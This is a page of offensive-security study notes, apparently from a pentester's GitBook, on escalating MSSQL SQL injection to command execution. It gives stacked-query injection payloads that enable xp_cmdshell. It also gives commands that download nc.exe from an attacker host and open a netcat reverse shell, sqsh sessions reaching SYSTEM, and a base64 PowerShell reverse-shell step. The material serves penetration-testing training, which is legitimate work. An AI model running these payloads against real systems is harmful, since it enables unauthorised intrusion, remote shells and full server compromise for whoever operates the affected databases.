OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • SQL Injection to RCE
  • Getting RCE on MSSQL
  1. Offensive Security Notes
  2. Windows
  3. Checklist - PrivEsc

MSSQL

PreviousChecklist - PrivEscNextPsExec.exe

Last updated 3 years ago

SQL Injection to RCE

is_srvrolemember('sysadmin')

If it is equal to one, you can be execute xp_cmdshell command.

' UNION SELECT NULL,test,NULL FROM Users; WAITFOR DELAY '0:0:5';--  - multiple queries ok.

' UNION SELECT NULL,test,NULL FROM Users; EXEC xp_cmdshell "whoami";--   - nope.

' UNION SELECT NULL,test,NULL FROM Users; EXEC sp_configure "show advanced options", 1;RECONFIGURE;EXEC sp_configure "xp_cmdshell", 1;RECONFIGURE;--

' UNION SELECT NULL,test,NULL FROM Users; EXEC master..xp_cmdshell "whoami";-- - ok.

' UNION SELECT NULL,test,NULL FROM Users; EXEC master..xp_cmdshell "powershell Invoke-WebRequest -Uri http://192.168.1.1/nc.exe -OutFile nc.exe";--  -OK

' UNION SELECT NULL,test,NULL FROM Users; EXEC master..xp_cmdshell "nc.exe -e cmd 192.168.1.1 80";-- -OK

Getting RCE on MSSQL

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell

xp_cmdshell - Can only be executed by 'sa' and any other users with 'sysadmin' privileges

By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)

If we have credentials and mssql port is open to external access, we can connect with sqsh.

sqsh -S 192.168.1.2 -U {USER} -P {PASS} -D {DATABASENAME(NOT REQUIRED)}
1> EXEC master..xp_cmdshell 'whoami'
2> go

Msg 15281, Level 16, State 1
Server 'TEST\SQLEXPRESS', Procedure 'master..xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell'
because this component is turned off as part of the security configuration for this
server. A system administrator can enable the use of 'xp_cmdshell' by using
sp_configure. For more information about enabling 'xp_cmdshell', search for
'xp_cmdshell' in SQL Server Online.

If the output like the above then you need to activate the cmdshell feature with below commands

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go
Configuration option 'show advanced options' changed from 0 to 1. Run the
RECONFIGURE statement to install.
(return status = 0)

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)

With the above command we have configured that our SQL Server is able to execute command at the server.

1> xp_cmdshell 'whoami'
2> go

        output                                                                      

        ----------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
----------------

        nt authority\system                                                         

        NULL                                                                        

(2 rows affected, return status = 0)

To get reverse shell, we can execute powershell command.

https://www.revshells.com/ - Powershell #3 (Base64) - 192.168.1.1 - 80 - powershell

1> EXEC master..xp_cmdshell 'powershell -e JABjAG..........'
2> go
https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e